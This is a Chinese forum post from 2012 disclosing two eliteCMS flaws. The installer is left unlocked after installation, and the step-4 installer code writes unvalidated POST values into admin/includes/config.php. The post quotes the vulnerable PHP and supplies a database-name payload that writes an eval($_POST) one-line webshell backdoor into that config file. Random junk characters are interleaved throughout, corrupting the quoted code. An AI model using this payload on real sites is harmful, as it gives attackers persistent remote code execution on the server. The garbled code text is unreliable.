eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
1 _9 J5 F: Q( _2 T- P, v- Z% M( M2 X
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php E- |* i+ j! p: b6 t* i2 q
我们来看代码:
" _* W0 Z) G4 K9 u; d 2 E8 ~4 q8 c/ K0 W/ H5 f
..., {8 D' g r% G/ J
elseif ($_GET['step'] == "4") {
; k/ ]& s0 z3 W# a5 ?0 x0 Z$ _ $file = "../admin/includes/config.php";
: K1 ]: q6 r) ~% L $write = "<?php\n";
6 e3 B0 A8 b% T" b# V6 q1 H $write .= "/**\n";
4 z1 g( C) ]3 v( Y; a) U $write .= "*\n";( p: ~( t* U7 Y
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
: [+ K) m- m$ ?1 b4 U5 s) k& v! K...略...
+ l1 d, t& Q% g $write .= "*\n";
* V2 e( L: x( m+ ?$ t& P& A $write .= "*/\n";0 ?& l; T1 Q+ m4 {) ^) n8 z& N
$write .= "\n";
6 t& E- x+ t) g% ^ $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
3 ?1 E7 \6 D' j6 {- N# J! E $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";$ q0 c ~. I2 N8 D- [+ S5 p
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";. Q* ~6 s. v* v
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";* L$ @6 m, j0 K
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
0 D0 c# O- x7 o- H/ l $write .= "if (!\$connection) {\n";7 }3 Q0 E$ x+ d3 a* j4 v# L
$write .= " die(\"Database connection failed\" .mysql_error());\n";# q7 c# V% o: I, k! S
$write .= " \n";
( t/ |+ i% ?2 M1 b $write .= "} \n";( x; b% @0 l8 ]. h
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";7 c7 M" O1 M2 J
$write .= "if (!\$db_select) {\n";
- C" K1 N$ q+ z$ e $write .= " die(\"Database select failed\" .mysql_error());\n";
- D, v! W$ ?. X* j) Y2 l# ^. b $write .= " \n";
W; t& {( V, w- Q $write .= "} \n";
& o- Y" Q( R% U# h4 l! k( Q& x $write .= "?>\n";! l( h. w- T" X( e6 g$ i3 o
+ |& r3 o& c, x6 T* \' C7 H $writer = fopen($file, 'w');$ v4 C) A- Q5 n O2 Z& V
...
7 i8 g' R. X a' J: m0 _
9 l" q! n5 F9 B$ x在看代码:
$ t w5 B0 O4 B) f5 i {8 V
/ [! E# K2 [7 U" v5 J) [% \$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
7 ~2 X! g' t- v6 A- f$_SESSION['DB_NAME'] = $_POST['DB_NAME'];( P8 ] t4 r8 ]" _
$_SESSION['DB_USER'] = $_POST['DB_USER'];
9 Y7 V8 g6 b1 A; v5 S8 s$_SESSION['DB_PASS'] = $_POST['DB_PASS'];! F3 V/ L: q! M& P
1 G- c4 c& p B4 S. W
取值未作任何验证
8 V0 n2 H* [/ T3 |% r- }/ R如果将数据库名POST数据:& d9 M7 c. f2 B
; N; ~3 R& ^4 v) \# G"?><?php eval($_POST[c]);?><?php
! U8 o- H+ V) }- B" I2 Q, G0 S
! Z$ g7 l9 t' \) u将导致一句话后门写入/admin/includes/config.php$ I3 t5 [% Y4 h( Q2 s! o
|
发表于 2012-11-18 13:59:27
收藏
支持
反对